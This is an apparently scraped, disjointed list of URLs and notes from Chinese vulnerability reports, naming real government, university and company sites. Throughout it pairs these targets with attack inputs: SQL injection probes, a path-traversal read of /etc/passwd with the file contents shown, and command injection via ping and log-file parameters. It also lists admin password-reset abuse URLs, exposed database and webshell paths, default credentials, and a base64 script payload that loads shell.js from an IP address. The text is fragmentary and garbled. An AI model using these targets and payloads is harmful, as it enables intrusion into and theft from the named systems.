http://lx.gsws.gov.cn/admin/webedit/admin_login.asp http://pljk.gsws.gov.cn/admin/webedit/admin_login.asp http://jqjk.gsws.gov.cn/admin/webedit/admin_login.asp http://lxjk.gsws.gov.cn/admin/webedit/admin_login.asp http://dsa.dayainfo.com/ http://www.jiechengit.com/index.html http://www.jiechengit.com/case.html http://club.show.sina.com.cn http://club.show.sina.com.cn/viewthread.php?tid=624385&page=1 http://www.conet.org.cn/skill/index.html http://www.conet.org.cn/module/skilliden/perScoreQueryInfo.do?aptScoreId=xxxx http://www.elut.cn/works.html http://www.sunrisingbelt.com/product_show.asp?keyno=1242 http://www.sunrisingbelt.com/news_detail.asp?keyno=532 http://www.hnttex.com/news_detail.asp?keyno=620 http://www.hnttex.com/product_show.asp?keyno=1278 http://www.dgzhuoshun.com/product_show.asp?keyno=1186 http://www.dgzhuoshun.com/news_detail.asp?keyno=616 http://www.lonova-ele.com/product_show.asp?keyno=1296 http://www.lonova-ele.com/news_detail.asp?keyno=532 http://www.wisevigor.com/product_show.asp?keyno=1270 http://www.wisevigor.com/news_detail.asp?keyno=511 http://www.easymechem.com/news_detail.asp?keyno=532 http://www.easymechem.com/product_show.asp?keyno=1204 http://www.printingbetter.com/product_show.asp?keyno=1219 http://www.printingbetter.com/news_detail.asp?keyno=560 http://www.todobelt.com/product_show.asp?keyno=1217 http://www.todobelt.com/news_detail.asp?keyno=629 www.jiafutong.net http://demo.xdcms.cn/ http://www.woqu.com/hotel/search/lc-USLAX;sd-20140925;ed-20140926;prf-0;prt-100000;str-0;st-mt;p-5?hotelCode=1&key=1 http://www.sxaj.gov.cn/utility/script.aspx?key=tag&t=TWV0YS5XZWIuQWR2ZXJ0cy5Kc0FELE1ldGEuV2ViLkFkdmVydHM=&p=tq http://huihua.hebtu.edu.cn/hhoffice),可发布,查询等等。没敢上传,目测可以SHELL,(不行你也别打我)。工会 http://nczx.yonyou.com/tanchu.htm ftp://125.35.5.209/ ftp://125.35.5.232/ http://sports.shangdu.com/heibai/?c=web&a=lists&aid=105 http://118.180.8.111/login.jsp http://183.224.77.7/loginAction.action http://www.cdpx.net/oa/WebOA/UploadFile/Student/ https://222.190.175.209/ http://gdtj.chinasarft.gov.cn/wszb/filemanage/ajaxGetDepartList.aspx?departcode=%27 http://gdtj.chinasarft.gov.cn/wszb/filemanage/ajaxGetDep http://10.143.34.170的80端口给了我200的返回,于是打开ip看看。 prtgadmin:prtgadmin http://www.ahtxjs.com/UploadFiles/ http://nclub.dongfeng-nissan.com.cn/MemberNew/FindPassWord.aspx http://owners.dongfeng-nissan.com.cn/MemberNew/ActivityDetail.aspx?code=ACTOPV130131R5133*&type=4 www.dnsvhost.com http://web440457.dnsvhost.com/,尝试后台地址和管理员密码组合,后台在http://web440457.dnsvhost.com/admin/,密码为admin/admin。 http://www.wxlibiao.com/home/?uid=10549 inurl:/dpma/FWeb/ http://www.hbgsny.com/Admin/login.aspx inurl:channel.php?root_lanmu= http://www.sxglwz.com/channel.php?root_lanmu=9 http://www.sxglwz.com/news.php?root_lanmu=21 http://www.sxglwz.cc/news.php?root_lanmu=18 http://www.sxglwz.com/channel.php?root_lanmu=9 http://www.sxglwz.com/news.php?id=87&root_lanmu=18&sub_lanmu=139 http://www.xiec.com/news.php?root_lanmu=3 http://www.xiec.com/channel.php?root_lanmu=1&sub_lanmu=20 http://www.longwill.biz/cn/news.php?root_lanmu=9 http://www.longwill.biz/cn/channel.php?root_lanmu=13 http://www.luluchang.com/Web/channel.php?root_lanmu=17&sub_lanmu=54 http://www.zdgj.cc/channel.php?id=52&root_lanmu=58&sub_lanmu=139 http://sxglwz.biz/channel.php?root_lanmu=20 http://www.sx12122.net/channel.php?id=555&root_lanmu=45&sub_lanmu=117 http://www.sxglwz.net.cn/channel.php?id=31&root_lanmu=20&sub_lanmu=149 http://www.z029.com/ inurl:php/WZ_read.php?articid= http://www.htgrape.com/php/WZ_read.php?articid=107 http://www.xdblq.com/php/WZ_read.php?articid=96 http://www.forstar.com.cn/php/news_table.php?id=1242 http://www.zryhsx.com/php/WZ_read.php?articid=341 http://www.xayzw.com/php/news_read.php?articid=643 http://www.xasaihu.com/php/WZ_read.php?articid=262 http://www.xaqsw.com/php/wz_read.php?articid=324 http://www.laosundajia.com/php/wz_read.php?articid=1485 http://www.guangrensi.com/php/WZ_read.php?articid=54 http://www.htgrape.com/php/WZ_read.php?articid=109 http://www.xasaihu.com/php/WZ_read.php?articid=230 http://www.anchensw.com/php/wz_read.php?articid=17 http://www.silian.com.cn/php/wz_read.php?id=33 http://www.sundagentleman.com/FT/php/wz_read.php?id=121 http://www.htgrape.com/php/WZ_read.php?articid=107'%20and%20'1'='1 http://www.htgrape.com/php/WZ_read.php?articid=107'%20and%20'1'='2 http://www.xdblq.com/php/WZ_read.php?articid=92'%20and%20'1'='1 http://www.xdblq.com/php/WZ_read.php?articid=92'%20and%20'1'='2 http://www.forstar.com.cn/php/news_table.php?id=1242'%20and%20'1'='1 http://www.forstar.com.cn/php/news_table.php?id=1242'%20and%20'1'='2 http://www.zryhsx.com/php/WZ_read.php?articid=341'%20and%20'1'='1 http://www.zryhsx.com/php/WZ_read.php?articid=341'%20and%20'1'='2 http://www.xaqsw.com/php/wz_read.php?articid=324'%20and%20'1'='1 http://www.xaqsw.com/php/wz_read.php?articid=324'%20and%20'1'='2 http://www.xayzw.com/php/news_read.php?articid=643'%20and%20'1'='1 http://www.xayzw.com/php/news_read.php?articid=643'%20and%20'1'='2 http://www.xasaihu.com/php/WZ_read.php?articid=262'%20and%20'1'='1 http://www.xasaihu.com/php/WZ_read.php?articid=262'%20and%20'1'='2 http://www.laosundajia.com/php/wz_read.php?articid=1485'%20and%20'1'='1 http://www.laosundajia.com/php/wz_read.php?articid=1485'%20and%20'1'='2 http://www.sundagentleman.com/FT/php/wz_read.php?id=121'%20and%20'1'='1 http://www.sundagentleman.com/FT/php/wz_read.php?id=121'%20and%20'1'='2 http://www.silian.com.cn/php/wz_read.php?id=33'%20and%20'1'='1 http://www.silian.com.cn/php/wz_read.php?id=33'%20and%20'1'='2 http://www.anchensw.com/php/wz_read.php?articid=17'%20and%20'1'='1 http://www.anchensw.com/php/wz_read.php?articid=17'%20and%20'1'='2 http://www.xasaihu.com/php/WZ_read.php?articid=230'%20and%20'1'='1 http://www.xasaihu.com/php/WZ_read.php?articid=230'%20and%20'1'='2 http://www.guangrensi.com/php/WZ_read.php?articid=54'%20and%20'1'='1 http://www.guangrensi.com/php/WZ_read.php?articid=54'%20and%20'1'='2 http://www.gxbttc.com/Login.aspx http://xhzhglxt.cirea.org.cn/website/zcxt_1_cx_gs.asp?DwID=23423 www.wanxinsoft.com http://www.wanxinsoft.com/product1_1.asp http://sys.zafu.edu.cn:81/ http://210.27.176.162/ http://sys.zafu.edu.cn/dy/ http://202.114.168.176/ http://59.69.101.10/ http://202.114.168.176/model/TwoGradePage/newsdetail.aspx?id=133&columnId=99 http://202.114.168.176/model/TwoGradePage/NewsEquipment.aspx?OpenID=82&id=11316 http://202.114.168.176/model/TwoGradePage/newsdetail.aspx?id=133&columnId=99 www.wanxinsoft.com http://www.wanxinsoft.com/product1_1.asp http://sys.zafu.edu.cn:81/ http://210.27.176.162/ http://sys.zafu.edu.cn/dy/ http://202.114.168.176/ http://59.69.101.10/ http://202.114.168.176/model/TwoGradePage/jifen.aspx?columnId=75 http://202.114.168.176/model/TwoGradePage/CIntroduce.aspx?columnId=96 http://202.114.168.176/model/TwoGradePage/CIntroduce.aspx?columnId=96 http://jg.chinasarft.gov.cn/eap/GDZJReport.do?channel=1&cmd=list&listformid=gd_content_nr_list http://120.132.144.28/ajax/colorsize.php?action=size&id=3382&color=%E6%B7%A1%E9%9B%85%E7%B4%AB http://120.132.144.28/ajax/colorsize.php?action=size&id=3382&color=%E6%B7%A1%E9%9B%85%E7%B4%AB http://www.isoffice.cn/Web/Index/WebDetail/customer http://oa.ahxf.gov.cn/nzyd/show.asp?ID=20387 http://www.familymart.com.cn/brand/newsDetail?id= http://jiwei.dongying.gov.cn/ www.wanxinsoft.com http://www.wanxinsoft.com/product1_1.asp http://sys.zafu.edu.cn:81/ http://210.27.176.162/ http://sys.zafu.edu.cn/dy/ http://202.114.168.176/ http://59.69.101.10/ http://202.114.168.176/model/TwoGradePage/NewsMore.aspx?columnId=97 http://202.114.168.176/model/TwoGradePage/devTrans.aspx?devcode=DL000001 http://202.114.168.176/model/TwoGradePage/LookShiYanShi.aspx?LID=292&columnId=98 http://202.114.168.176/model/TwoGradePage/NewsMore.aspx?columnId=97 http://www.anmai.net/anmai/oa/adduser.aspx?id=1 https://1.202.234.22/admin/singlelogin.php?submit=1&loginId=1 https://1.202.234.22/admin/list_ipAddressPolicy.php?GroupId=1 http://m.tiantian.com/login/userRegTwo?Ajax_CallBack=true Content-type:application/x-www-form-urlencoded http://pan.baidu.com/s/1eQd4I9W#dir/path=%2Fkodexplorer https://1.202.234.22/debug/show_logfile.php?filename=/Isc/Log/proxy.log;ls%20-al http://so.sdey.net/topic.php?id=18 http://202.113.60.9/lib/main/information_open.asp?id=1101 http://rczp.tyut.edu.cn/xtgl/index_sessionOut.html http://202.202.160.39:8021/zftal-hrm/xtgl/login_loginpage.html http://ywxt.suoyuan.com.cn/zftal-hrm/xtgl/login_loginpage.html http://hr.tjtc.edu.cn/zftal-hrm/xtgl/login_loginpage.html http://zp.shafc.edu.cn/xtgl/login_loginpage.html http://rs.wtc.edu.cn:8021/zftal-hrm/xtgl/login_loginpage.html http://todo.pigai.org/ http://bazhong.wxcs.cn http://www.notery.net http://www.xyfg.gov.cn/ http://www.erdostjgzc.com/page.asp?id=612 http://www.hhhtgzc.com/page.asp?id=620 http://www.erdoszxgzc.com/page.asp?id=630 http://www.kqgzc.com/page.asp?id=589 http://www.fygzc.cn/page.asp?id=397 http://sggzccn.cnc506.000pc.net/page.asp?id=594 https://182.151.203.168/por/login_psw.csp http://www.wxxzbjy.com/ http://**.**.** http://**.**.**/ http://**.**.**/ http://**.**.**/ http://**.**.**/ http://**.**.**/ http://**.**.**/ http://**.**.**/ ttp://**.**.**/dpm ttp://**.**.** http://iqxxx.net/dpma/FWeb/SPEWeb/Web/SPENewsList.aspx?KindSetID=1000314&sid=315001 http://**.**.** http://**.**.** http://42.99.16.149:8080/WX_CUST_WEBSERVICE/wapSelf/wapSelfAction.do?action=packageUseChange&openID=0&menuID=&flowID=&flowParam=&platform=YX&telephone=18912345678 http://gxy.sicnu.edu.cn http://mail.csztv.com/webmail/getPass1.php?email=zzz@csztv.com&update=s http://mail.csztv.com/webmail/client/cache/1663/14111168401.jpg/1.php http://www.envsc.cn/applyonline/login/Index.aspx http://www.envsc.cn/schedulingplatform/PlatformLogin/login.html http://wap.chinaiiss.com/touch/pk http://202.199.184.9/ http://www.fxzxyy.com/newsShow.Asp?id=482 http://www.hrbsdsyy.com/xw.asp?txtKeyword=1 http://www.rwsk.zjut.edu.cn/xwzx/xwzx.asp?new_sort=1 http://zulg.zju.edu.cn/display.php?menu=1&c_menu=5 http://zulg.zju.edu.cn/display.php?c_menu=20 http://zulg.zju.edu.cn/phpinfo.php http://122.102.2.10:8081/webgis/login.aspx http://61.155.9.52/webgis/login.aspx http://www.asiot.com/) http://www.strongsoft.net/ http://cose.seu.edu.cn/onews.asp?id=2010 http://www.jisu8.cn/ http://www.jisu8.cn/game/h.php?ip= http://www.lerye.com/case.asp http://www.lerye.cn/case.asp www.szshuntong.cn/data/web.mdb www.szzel.com/data/web.mdb www.shcwine.com/data/web.mdb www.yunyvision.com/data/web.mdb www.szxmjy.com/data/web.mdb www.xiangshanmall.com/data/web.mdb www.cipon.net/data/web.mdb www.qmgg.com.cn/data/web.mdb www.oulang.net/data/web.mdb www.asieris.cn/data/web.mdb www.lemsz.com/data/web.mdb www.sunrous.com/data/web.mdb www.jssgui.com/data/web.mdb www.jsyl155.com/data/web.mdb www.tzhpmy.com/data/web.mdb www.sz-sjbx68.com/data/web.mdb www.txhengrui.com/data/web.mdb euweili.w28.mc-test.com/data/web.mdb www.txjybg.com/data/web.mdb www.szwsxn.com/data/web.mdb www.szxyyt.com/data/web.mdb www.txbjnjb.com/data/web.mdb http://www.lenovostoreapp.com/ http://www.hao360.cn/plus/comments_list.php?id=15730 inurl:IndexViewController.do?method=index http://www.lazfcg.gov.cn/huoshan/IndexViewController.do?method=index http://www.hszgj.cn/IndexViewController.do?method=index http://kszfcg.gov.cn/IndexViewController.do?method=index http://www.szzfcg.gov.cn/IndexViewController.do?method=index http://www.ydzfcg.gov.cn/IndexViewController.do?method=index http://ztb.taihe.gov.cn/IndexViewController.do?method=index http://www.qdkfqcg.gov.cn/IndexViewController.do?method=index http://www.fcxzfcg.gov.cn/IndexViewController.do?method=index http://www.lbzfcg.gov.cn/IndexViewController.do?method=index http://cgzx.ahzfcg.gov.cn/IndexViewController.do?method=index http://www.tlzbcg.com/IndexViewController.do?method=index http://www.sxzfcg.gov.cn/IndexViewController.do?method=index http://www.sixianzfcg.gov.cn/IndexViewController.do?method=index http://222.216.4.8/IndexViewController.do?method=index http://www.jimozfcg.cn/IndexViewController.do?method=index http://www.jzzfcg.gov.cn/IndexViewController.do?method=index http://218.22.70.134:85/IndexViewController.do?method=toLogin http://www.xxzfcg.gov.cn/IndexViewController.do?method=index http://www.hnzfcg.gov.cn/IndexViewController.do?method=index http://www.mczb.gov.cn/IndexViewController.do?method=index http://hscgw.gov.cn/IndexViewController.do?method=index http://www.lazfcg.gov.cn/yeji/IndexViewController.do?method=index http://www.lazfcg.gov.cn/jinan/IndexViewController.do?method=index http://www.lazfcg.gov.cn/shucheng/IndexViewController.do?method=index http://www.lazfcg.gov.cn/IndexViewController.do?method=index http://www.lazfcg.gov.cn/huoqiu/IndexViewController.do?method=index http://lbzfcg.gov.cn/IndexViewController.do?method=index http://mczb.gov.cn/IndexViewController.do?method=index http://zfcg.mccz.gov.cn/IndexViewController.do?method=index http://caigou.pingdu.gov.cn/IndexViewController.do?method=index http://zfcg.laoshan.gov.cn:88/IndexViewController.do?method=index http://www.aqzfcg.gov.cn/IndexViewController.do?method=index http://www.yqzfcg.cn/IndexViewController.do?method=index http://www.cngpc.com/IndexViewController.do?method=index http://lazfcg.gov.cn/IndexViewController.do?method=index http://60.171.34.186/IndexViewController.do?method=index http://xxx.gov.cn/UserSecurityController.do?method=getPassword&step=1 http://xxx.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.lazfcg.gov.cn/huoshan/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.hszgj.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://kszfcg.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.szzfcg.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.ydzfcg.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://ztb.taihe.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.qdkfqcg.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.fcxzfcg.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.lbzfcg.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://cgzx.ahzfcg.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.tlzbcg.com/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.sxzfcg.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.sixianzfcg.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://222.216.4.8/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.jimozfcg.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.jzzfcg.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://218.22.70.134:85/IndexViewController.do?method=toLogin http://www.xxzfcg.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.hnzfcg.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.mczb.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://hscgw.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.lazfcg.gov.cn/yeji/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.lazfcg.gov.cn/jinan/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.lazfcg.gov.cn/shucheng/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.lazfcg.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.lazfcg.gov.cn/huoqiu/UserSecurityController.do?method=getPassword&step=2&userName=admin http://lbzfcg.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://mczb.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://zfcg.mccz.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://caigou.pingdu.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://zfcg.laoshan.gov.cn:88/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.aqzfcg.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.yqzfcg.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.cngpc.com/UserSecurityController.do?method=getPassword&step=2&userName=admin http://lazfcg.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://60.171.34.186/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.0730edu.cn/new_list.php?id=15331, http://www.0730edu.cn/admin/index.php http://www.sh-cloud.com http://www.sh-cloud.com/uploads/Users_Company_img/2014092012140351498.jsp http://www.sh-cloud.com/findProductListByName.act http://skypearl.csair.com/skypearl/cn/toPrintCard.action?memberNo=3139105509XX(匿了) http://skypearl.csair.com/skypearl/cn/getAccountPassword.action?&NOSSL http://218.193.224.21/fckeditor/editor/filemanager/browser/default/connectors/test.html http://218.193.224.21/UserFiles/File/aspx1.aspx http://xyh.fdzcxy.com/ListNew.aspx?type=1 http://library.fdzcxy.com http://xxxy.xtu.edu.cn/index.php/Departments/index/id/1/ http://www.tianji.com/ce/results http://118.145.12.169/ http://a.tbcdn.cn/sys/common/icon/rank/b_3_1.gif http://baike.baidu.com/view/3427522.htm?fr=aladdin inurl:newshare.aspx http://lib.ntu.edu.cn/menu_detail.jsp?id=16&iType_id=1 http://192.168.1.1/goform/Diagnosis?pingAddr=|echo http://192.168.1.1/goform/Diagnosis?pingAddr=192.168.1.100 Login:User:admin Mac:00:21:6b:13:6e:ac http://www.hunanfish.com/nshow.asp?id=680 http://www.rcwl.net/b/tea/bag_detail.jsp?hasChildType=1&typeId=1 http://www.7stars.net.cn/ http://www.7stars.net.cn/successful%20case.html site:gov.cn inurl:Person/Per_Search_Advance.aspx http://www.7stars.net.cn/ http://www.7stars.net.cn/successful%20case http://ywdw.jtonline.cn/njits/ http://58.18.141.140/jingwutong/index.php?m=Admin&c=Short&a=index&type=zong&id= http://www.ccgp-shandong.gov.cn/fin_info/site/index.jsp右侧看到很多链接,其中 http://123.233.119.251:8083/sdgp/logon.jsp http://60.216.5.87/expinfo/logon.jsp www.chesudi.com/的ERP后台 http://emall.life.cntaiping.com/mobile/download?sAction=loadIos&appType=5 http://learn.open.com.cn/Inquiry/View.aspx?QueryID=534&ResourceType=R1&ResourceCode=23859035-DD61-4C02-AB27-59190ABBC524 http://learn.open.com.cn/ http://www.hk.cntaiping.com任意文件读取 http://www.hk.cntaiping.com/include/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&filepath=download%2F http://www.hk.cntaiping.com/include/getfile.php?filename=55&file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&filepath=download%2F at:x:25:25:Batch daemon:/var/spool/atjobs:/bin/bash bin:x:1:1:bin:/bin:/bin/bash daemon:x:2:2:Daemon:/sbin:/bin/bash ftp:x:40:49:FTP account:/srv/ftp:/bin/bash games:x:12:100:Games account:/var/games:/bin/bash gdm:x:50:104:Gnome daemon:/var/lib/gdm:/bin/false haldaemon:x:101:102:User haldaemon:/var/run/hal:/bin/false lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false man:x:13:62:Manual viewer:/var/cache/man:/bin/bash messagebus:x:100:101:User D-BUS:/var/run/dbus:/bin/false mysql:x:60:106:MySQL admin:/var/lib/mysql:/bin/bash named:x:44:44:Name daemon:/var/lib/named:/bin/false news:x:9:13:News system:/etc/news:/bin/bash nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash ntp:x:74:103:NTP daemon:/var/lib/ntp:/bin/false postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false root:x:0:0:root:/root:/bin/bash sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false suse-ncc:x:102:105:Novell User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash uucp:x:10:14:Unix-to-Unix system:/etc/uucp:/bin/bash wwwrun:x:30:8:WWW apache:/var/lib/wwwrun:/bin/false webapp:x:1001:100:webapp:/srv/www/htdocs:/bin/bash http://192.168.1.101/KPPW/index.php?do=user&view=message&op=detail&type=private&intPage=1&msgId=16 http://192.168.1.101/KPPW/index.php?do=user&view=message&op=detail&type=private&intPage=1&msgId=16 http://192.168.1.101/KPPW/index.php?do=user&view=message&op=detail&type=private&intPage=1&msgId=16 http://www.centit.com/ http://www.ldzsc.gov.cn/info/infomation.do?method=list_index&type=1&no_=11&columnID_SEARCH_=11&columnName=通知公告&top_type=TZGG# http://www.ldzsc.gov.cn/manage/supPower.do?method=viewAttc&sort_id=94 http://www.ldzsc.gov.cn/lynet-sj/individualCenter/main_center.jsp?topGroup=JS070700CZ&adminType=FWBM http://www.ldzsc.gov.cn/lynet-sj/individualCenter/main_center.jsp?topGroup=D&no=JS070700CZ-CF-0001&adminType=FWBM_INFO http://www.ldzsc.gov.cn/info/infomation.do?method=list_index&type=1'%20and%20'1'='2&no_=11&columnID_SEARCH_=11&columnName=通知公告&top_type=TZGG# http://www.ldzsc.gov.cn/info/infomation.do?method=list_index&type=1'%20and%20'1'='1&no_=11&columnID_SEARCH_=11&columnName=通知公告&top_type=TZGG# http://www.ldzsc.gov.cn/manage/supPower.do?method=viewAttc&sort_id=94 http://www.ldzsc.gov.cn/manage/supPower.do?method=viewAttc&sort_id=94 http://www.ldzsc.gov.cn/lynet-sj/individualCenter/main_center.jsp?topGroup=JS070700CZ'%20and%20'1'='1&adminType=FWBM http://www.ldzsc.gov.cn/lynet-sj/individualCenter/main_center.jsp?topGroup=JS070700CZ'%20and%20'1'='2&adminType=FWBM http://www.ldzsc.gov.cn/lynet-sj/individualCenter/main_center.jsp?topGroup=D&no=JS070700CZ-CF-0001'%20and%20'1'='1&adminType=FWBM_INFO http://www.ldzsc.gov.cn/lynet-sj/individualCenter/main_center.jsp?topGroup=D&no=JS070700CZ-CF-0001'%20and%20'1'='2&adminType=FWBM_INFO http://218.92.49.74:8090/ganyunet/manage/supPower.do?method=viewAttc&sort_id=1412 http://www.ldzsc.gov.cn/manage/supPower.do?method=viewAttc&sort_id=94 http://218.92.50.139:8082/lygdhnet/manage/supPower.do?method=viewAttc&sort_id=1824 http://218.92.62.78/gnnet/manage/supPower.do?method=viewAttc&sort_id=1330 http://gk.ganyu.gov.cn:8090/ganyunet/manage/supPower.do?method=viewAttc&sort_id=1413 http://221.226.37.243:8080/sunnet/manage/supPower.do?method=viewAttc&sort_id=6 http://223.100.97.168/login.action http://ac.ppdai.com/userbind/setsafequestion http://123.125.84.73:8080/ http://service.caijing.com.cn/admin/adminusermanage/login/ http://www.hhsyy.com/run.php?partid=103 http://gzkg.e21.cn.login/login1.php?id=3 http://gzkg.e21.cn.login/login1.php?id=3 http://www.gdwh.com.cn/gdwhzyz/index.php http://www.nchbj.gov.cn/mail/index.asp http://ww1980.cqjjzx.com/webschool/Book/class_comm.jsp?orderBy=111"--tamper http://ww1980.cqjjzx.com/webschool/Book/class_comm.jsp?orderBy=111"--tamper http://ww1980.cqjjzx.com/webschool/Book/class_comm.jsp?orderBy=111 http://www.rcwl.net/webschool/Book/class_comm.jsp?orderBy=111 http://oa.xndxfz.com/webschool/Book/class_comm.jsp?orderBy=111 http://oa.dhssx.com/webschool/Book/class_comm.jsp?orderBy=111 http://oa.bashu.com.cn/webschool/Book/class_comm.jsp?orderBy=111 http://www.cqxjwxx.com.cn/webschool/Book/class_comm.jsp?orderBy=111 http://ltzx.zhedu.net.cn/webschool/Book/class_comm.jsp?orderBy=111 http://www.wxzzyey.com/webschool/Book/class_comm.jsp?orderBy=111 http://ww1980.cqjjzx.com/webschool/Book/class_comm.jsp?orderBy=111 http://www.wdlinux.cn http://demo.kesion.com/ask/q.asp?id=115 http://baike.baidu.com/view/1351295.htm http://www.yantai.gov.cn/cn/content/facility_yt/shzn/guide/index_lb_xs.jsp?id=80504&flags_id=16764 http://sha.sinotrans.com/jcms/m_5_b/selmulti_column.jsp?type=1 http://www.ylsy.edu.cn/ http://rw.ylsy.edu.cn http://fzxy.ylsy.edu.cn http://hxx.ylsy.edu.cn/ http://dxxy.ylsy.edu.cn/ http://zyx.ylsy.edu.cn/ http://sxx.ylsy.edu.cn/ http://tyxy.ylsy.edu.cn/ http://jyjs.ylsy.edu.cn/ http://wyx.ylsy.edu.cn/ http://wlxy.ylsy.edu.cn/ http://ysxy.ylsy.edu.cn/ http://zygb.ylsy.edu.cn/dhlm/jgsz/jxdw/ http://wyx.ylsy.edu.cn/ http://wyx.ylsy.edu.cn/news/html/index.php?id=518 http://nic.ylsy.edu.cn/admin/ http://nic.ylsy.edu.cn/index.php?mid=1 http://sxx.ylsy.edu.cn/base/admin/index.php http://yjsc.ylsy.edu.cn/admin/xyeWebEditor/admin/login.asp http://yjsc.ylsy.edu.cn/news.asp?id=52 http://yjsc.ylsy.edu.cn/admin/xycms.asp http://xbbj.ylsy.edu.cn/admin.php http://xbbj.ylsy.edu.cn/news/html/index.php?id=511 http://www.haitiansoft.com:8080/ http://road.hncc.edu.cn/About/About.asp?ID=8 http://road.hncc.edu.cn/WebAdmin/index.asp http://app.eduuu.com/wulijs/search.php http://www.cittc.org/ http://ipic.jittc.org/IPICMeeting/LogOn http://www.z2hospital.com/cms/do_search.aspx?gjz=1&lmid= http://web.nsu.edu.cn/webpage/7d1fecc7-71b9-405e-85c0-5503ceb2f806.asp?SS= http://10.nsu.edu.cn/list.aspx?c_id=4 http://itbm.ccniit.com/Class.aspx?id=9 http://www.ccniit.com/topics/topics.rar http://www.ccniit.com/HTML/intro/intro.rar http://www.ccniit.com/t.rar http://www.ahujhc.cn/include/web_content.php?id=6109 http://res1.wingontravel.com/pdf/main.php?tour_code=JSC05U http://61.145.231.45:6543/web1/tzgg.asp?id=257 https://member.meizu.com/uc/system/webjsp/member/activeMail?userId=2&token=8cd83ddebb17df68 BSoftNew.svc/GetMobileCheckCode?istaivextype=true&mobile=156...手机号省略...6 BSoftNew.svc/GetUserPasswordByCheckCode?messagetype=1&checkcode=7358&mobile=156...手机号省略...6 BSoftNew.svc/Login?username=156...省略...6&DevID=8...省略...0&OS=2&logintype=2&DevType=GT-I9128E&ClientVer=1.2.2&password=wooyun8899&DevVer=4.2.2 BSoftNew.svc/GetMobileCheckCode?istaivextype=true&mobile=156...手机号省略...7 BSoftNew.svc/AddMobileUser?password=pentest&checkcode=5821&mobile=156...手机号省略...7 http://autosite.idcs.cn/webmall/query.php?catid=27 http://autosite.idcs.cn/webmall/query.php?typeid=6 http://autosite.idcs.cn/news/class/index.php?catid=1&myord=dtime&myshownums=20&key=企业&imageField.x=28&imageField.y=9 http://autosite.idcs.cn/news/class/?76*1.html http://autosite.idcs.cn/news/class/?76*2.html伪静态盲注 http://autosite.idcs.cn/webmall/query.php?catid=27为例: http://www.ntzyy.com/showDzqkdo!showqtDzbknpList.do?stauts=2014%C4%EA%B5%DA01%C6%DA http://www.78888888.cn/fwxm.php?id=1 http://222.210.17.165/selects.asp http://222.210.17.165/index.asp http://mall.ecitic.com/MallWeb.zip http://sys.zs91.com/进入到系统内部,发现之前已近有白帽进行了通报,并且厂商已经进行了部分的封堵。但是通过观察和深入理解业务,才发现并非如此啊 http://www.haitiansoft.com:8080/ http://www.nc1y.com/yywh.asp?p=188&dir=253 http://www.sunlinks.cn http://www.sunlinks.cn/%E7%94%A8%E6%88%B7%E6%A1%88%E4%BE%8B.aspx http://www.jnszz.com.cn http://www.jnszz.com.cn http://www.jnszz.com.cn:8080/ http://www.jn27z.net:8090/ http://www.jnszjy.net/weboa/login.aspx http://www.jnxzzx.cn/weboa/ http://oa.jnbeitan.com/ http://oa.cqedu.com.cn/ http://oa.xiaolizhongxue.com/ http://www.lyxedu.net:8888/ http://www.jnfls.com:8080/ http://www.tqjy.com.cn:8080/ site:edu.cn http://61.233.9.66/svn/ http://61.233.9.66/svn/web/src/mail.ini http://61.233.9.66/svn/web/src/Core.properties http://61.233.9.66/svn/web/branch/V1.0/src/com/bean/BJSmsBean.java http://www.cfcpn.com/的 http://www.cfcpn.com/pzweb/admin/这个目录下的文件基本都存在未授权访问的问题 http://www.cfcpn.com/pzweb/admin/idea.jsp http://www.cfcpn.com/pzweb/admin/password.jsp直接列出了密码 http://www.cfcpn.com/common/download.jsp内容如下 http://www.cfcpn.com/common/download.jsp?file_path=/upload/../WEB-INF/&file_name=web.xml即可下载web.xml文件 data:text/html;base64 http://10.65.10.70/shell.js data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovLzEwLjY1LjEwLjcwL3NoZWxsLmpzID48L3NjcmlwdD4= http://www.wanxinsoft.com/product1_1.asp 